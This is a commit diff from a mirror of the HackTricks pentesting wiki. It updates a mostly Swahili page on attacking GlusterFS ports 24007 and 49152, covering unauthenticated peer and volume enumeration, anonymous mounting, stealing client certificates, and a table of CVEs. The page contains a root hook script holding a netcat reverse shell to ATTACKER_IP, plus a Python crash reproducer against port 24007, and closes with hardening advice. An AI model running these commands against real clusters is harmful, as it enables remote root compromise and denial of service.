mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/network-services-pentesting/24007-24008-24009-49152-pen
This commit is contained in:
Translator
parent
5fee66d601
commit
3890a247bd
@ -1,35 +1,115 @@
|
||||
# 24007-24008-24009-49152 - Pentesting GlusterFS
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
# Taarifa za Msingi
|
||||
## Basic Information
|
||||
|
||||
**GlusterFS** ni **mfumo wa faili ulio sambazwa** unaounganisha hifadhi kutoka kwa seva nyingi katika **mfumo mmoja uliounganishwa**. Inaruhusu **upanuzi wa kiholela**, ikimaanisha unaweza kuongeza au kuondoa seva za hifadhi kwa urahisi bila kuathiri mfumo wa faili kwa ujumla. Hii inahakikisha **upatikanaji** wa juu na **uvumilivu wa makosa** kwa data yako. Pamoja na GlusterFS, unaweza kufikia faili zako kana kwamba zimehifadhiwa kwa ndani, bila kujali miundombinu ya seva inayotumika. Inatoa suluhisho lenye nguvu na linaloweza kubadilika kwa usimamizi wa kiasi kikubwa cha data katika seva nyingi.
|
||||
|
||||
**Bandari za Kawaida**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (kuendelea)\
|
||||
Kwa bandari 49152, bandari zilizoongezwa kwa 1 zinahitaji kuwa wazi ili kutumia zaidi ya bricks. _Awali bandari 24009 ilitumika badala ya 49152._
|
||||
**GlusterFS** ni **mfumo wa faili ulio sambazwa** ambao unachanganya uhifadhi kutoka kwa seva nyingi katika **jina moja lililounganishwa**. Daemon ya usimamizi (`glusterd`) inasikiliza kwa default kwenye **24007/TCP** na inaagiza bricks za data-plane ambazo huanza kwenye **49152/TCP** (bandari moja kwa brick, ikiongezeka). Matoleo kabla ya 9.x yalitumia **24008–24009/TCP** kwa usafirishaji wa brick, hivyo bado utaona bandari hizo katika makundi ya urithi.
|
||||
```
|
||||
PORT STATE SERVICE
|
||||
24007/tcp open rpcbind
|
||||
49152/tcp open ssl/unknown
|
||||
PORT STATE SERVICE VERSION
|
||||
24007/tcp open glusterd GlusterFS (RPC)
|
||||
49152/tcp open gluster-brick SSL (TLS optional)
|
||||
```
|
||||
## Uainishaji
|
||||
> Kidokezo: 24007 inajibu simu za RPC hata wakati nodi za kuhifadhi pekee **hazitoi** kiasi chochote; kwa hivyo huduma hii ni lengo la kuaminika ndani ya miundombinu mikubwa.
|
||||
|
||||
Ili kuingiliana na mfumo huu wa faili unahitaji kufunga [**mteja wa GlusterFS**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`).
|
||||
## Uhesabu
|
||||
|
||||
Ili kuorodhesha na kuunganisha kiasi kinachopatikana unaweza kutumia:
|
||||
Sakinisha zana za mteja kwenye sanduku lako la shambulio:
|
||||
```bash
|
||||
sudo gluster --remote-host=10.10.11.131 volume list
|
||||
# This will return the name of the volumes
|
||||
|
||||
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
|
||||
sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu
|
||||
```
|
||||
Ikiwa unapokea **makosa ya kujaribu kuunganisha mfumo wa faili**, unaweza kuangalia kumbukumbu katika `/var/log/glusterfs/`
|
||||
1. **Ugunduzi wa wenzangu & afya**
|
||||
```bash
|
||||
# List peers (works without authentication in default setups)
|
||||
gluster --remote-host 10.10.11.131 peer status
|
||||
```
|
||||
2. **Upelelezi wa kiasi**
|
||||
```bash
|
||||
# Retrieve the list of all volumes and their configuration
|
||||
gluster --remote-host 10.10.11.131 volume info all
|
||||
```
|
||||
3. **Kuweka bila ruhusa**
|
||||
```bash
|
||||
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
|
||||
```
|
||||
Ikiwa usakinishaji unashindwa, angalia `/var/log/glusterfs/<vol_name>-<uid>.log` upande wa mteja. Masuala ya kawaida ni:
|
||||
|
||||
**Makosa yanayohusisha vyeti** yanaweza kutatuliwa kwa kuiba faili (ikiwa una ufikiaji wa mfumo):
|
||||
* TLS enforcement (`option transport.socket.ssl on`)
|
||||
* Address based access control (`option auth.allow <cidr>`)
|
||||
|
||||
- /etc/ssl/glusterfs.ca
|
||||
- /etc/ssl/glusterfs.key
|
||||
- /etc/ssl/glusterfs.ca.pem
|
||||
### Ukarabati wa cheti
|
||||
|
||||
Na kuyahifadhi katika mashine yako kwenye saraka ya `/etc/ssl` au `/usr/lib/ssl` (ikiwa saraka tofauti inatumika angalia mistari inayofanana na: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" katika kumbukumbu).
|
||||
Pora faili zifuatazo kutoka kwa nodi yoyote ya mteja iliyoidhinishwa na uweke katika `/etc/ssl/` (au saraka iliyoonyeshwa katika kumbukumbu ya makosa):
|
||||
```
|
||||
/etc/ssl/glusterfs.pem
|
||||
/etc/ssl/glusterfs.key
|
||||
/etc/ssl/glusterfs.ca
|
||||
```
|
||||
---
|
||||
|
||||
## Uthibitisho wa Uthibitisho (2022-2025)
|
||||
|
||||
| CVE | Matoleo yaliyoathiriwa | Athari | Maelezo |
|
||||
|-----|-------------------|--------|-------|
|
||||
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Tumia-baada-ya-kuachia katika `dht_setxattr_mds_cbk` inayoweza kufikiwa kupitia mtandao | **DoS** ya mbali na uwezekano wa RCE. Imerekebishwa katika 10.4.1 / 11.1. |
|
||||
| **CVE-2023-26253** | < 11.0 | Kusoma nje ya mipaka katika FUSE notify handler | Kuanguka kwa mbali kupitia operesheni za FS zilizoundwa; PoC ya umma inapatikana. |
|
||||
| **CVE-2023-3775** | < 10.5 / 11.1 | Uthibitisho usio sahihi wa ruhusa wakati wa kupandisha `gluster_shared_storage` | Inaruhusu mteja yeyote asiye na uthibitisho kupandisha kiasi cha admin – inasababisha **priv-esc** iliyoelezewa hapa chini. |
|
||||
|
||||
> Daima angalia `gluster --version` **katika kila node**; makundi tofauti ni ya kawaida baada ya sasisho za sehemu.
|
||||
|
||||
### Kutumia `gluster_shared_storage` (Kuongeza Haki)
|
||||
|
||||
Hata katika matoleo ya hivi karibuni, wasimamizi wengi wanaacha kiasi maalum cha `gluster_shared_storage` kuwa na uwezo wa kusomeka na kila mtu kwa sababu inarahisisha geo-replication. Kiasi hiki kina templates za cronjob ambazo zinafanya kazi na **root** katika kila node.
|
||||
```bash
|
||||
# 1. Mount admin volume anonymously
|
||||
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss
|
||||
|
||||
# 2. Drop malicious script that gets synchronised cluster-wide
|
||||
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
|
||||
#!/bin/bash
|
||||
nc -e /bin/bash ATTACKER_IP 4444 &
|
||||
EOF
|
||||
chmod +x /tmp/gss/hooks/1/start/post/test.sh
|
||||
|
||||
# 3. Wait until glusterd distributes the hook and executes it as root
|
||||
```
|
||||
Ikiwa `hooks/1/` haipo, angalia `/ss_bricks/` – njia halisi inaweza kutofautiana na toleo kuu.
|
||||
|
||||
### Denial-of-Service PoC (CVE-2023-26253)
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
|
||||
import socket, xdrlib, struct
|
||||
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
|
||||
with socket.create_connection(("10.10.11.131",24007)) as s:
|
||||
s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
|
||||
s.send(p.get_buffer())
|
||||
```
|
||||
Kukimbia kwa script kunasababisha `glusterfsd` < 11.0.
|
||||
|
||||
---
|
||||
|
||||
## Kuimarisha & Ugunduzi
|
||||
|
||||
* **Sasisha** – LTS ya sasa ni 11.1 (Julai 2025). CVE zote zilizo juu zimefanyiwa marekebisho.
|
||||
* Wezesha **TLS** kwa kila brick:
|
||||
|
||||
```bash
|
||||
gluster volume set <vol> transport.socket.ssl on
|
||||
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
|
||||
```
|
||||
* Punguza wateja kwa orodha za CIDR:
|
||||
|
||||
```bash
|
||||
gluster volume set <vol> auth.allow 10.0.0.0/24
|
||||
```
|
||||
* Funua bandari ya usimamizi 24007 tu kwenye **VLAN ya kibinafsi** au kupitia SSH tunnels.
|
||||
* Angalia kumbukumbu: `tail -f /var/log/glusterfs/glusterd.log` na konfigura kipengele cha **audit-log** (`volume set <vol> features.audit-log on`).
|
||||
|
||||
---
|
||||
|
||||
## Marejeleo
|
||||
|
||||
* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
|
||||
* [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user